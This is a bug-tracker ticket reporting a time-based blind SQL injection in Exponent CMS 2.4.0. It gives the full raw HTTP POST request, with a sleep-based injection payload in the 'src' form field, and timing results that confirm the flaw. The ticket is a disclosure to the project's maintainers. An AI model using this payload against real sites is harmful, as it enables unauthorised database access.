Blind SQL Injection Vulnerability in Exponent CMS 2.4.0
Reported by Nicky | November 4th, 2016 @ 02:32 AM
POST /exponent/index.php HTTP/1.1
Content-Length: 865
Content-Type: multipart/form-data;
boundary=-----Boundary_GXLNYFRMTV
X-Requested-With: XMLHttpRequest
Referer: http://192.168.118.1:80/exponent/
Cookie: PHPSESSID=671871947f2a01e5a385139b4131c7c1;
adminer_key=9481c8797fb634e88f45043b9f1590fe; osp=0000
Host: 192.168.118.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21
(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: /
Content-Type: multipart/form-data;
boundary=-----Boundary_GVJVYRLGSF
-------Boundary_GVJVYRLGSF Content-Disposition: form-data; name="action"
update
-------Boundary_GVJVYRLGSF Content-Disposition: form-data;
name="body"
1
-------Boundary_GVJVYRLGSF Content-Disposition: form-data;
name="controller"
text
-------Boundary_GVJVYRLGSF Content-Disposition: form-data;
name="id"
-------Boundary_GVJVYRLGSF Content-Disposition: form-data; name="int"
-------Boundary_GVJVYRLGSF Content-Disposition: form-data; name="rank"
-------Boundary_GVJVYRLGSF Content-Disposition: form-data; name="revision_id"
-------Boundary_GVJVYRLGSF Content-Disposition: form-data; name="src"
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ -------Boundary_GVJVYRLGSF Content-Disposition: form-data; name="title"
Mr.
-------Boundary_GVJVYRLGSF--
POST (multipart) input src was set to (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/
Tests performed:
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
=> 18.377 s
(select(0)from(select(sleep(4)))v)/*'+(select(0)from(select(sleep(4)))v)+'"+(select(0)from(select(sleep(4)))v)+"*/
=> 12.683 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/
=> 0.437 s
(select(0)from(select(sleep(2)))v)/*'+(select(0)from(select(sleep(2)))v)+'"+(select(0)from(select(sleep(2)))v)+"*/
=> 6.349 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/
=> 0.624 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/
=> 0.967 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/
=> 0.998 s
(select(0)from(select(sleep(4)))v)/*'+(select(0)from(select(sleep(4)))v)+'"+(select(0)from(select(sleep(4)))v)+"*/
=> 13.104 s
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/
=> 0.234 s
Original value: @footer
Comments and changes to this ticket
Please Sign in or create a free account to add a new ticket.
With your very own profile, you can contribute to projects, track your activity, watch tickets, receive and update tickets through your email and much more.
Create new ticket
Create your profile
Help contribute to this project by taking a few moments to create your personal profile. Create your profile ยป
Bug Tracker for Exponent CMS
expNinja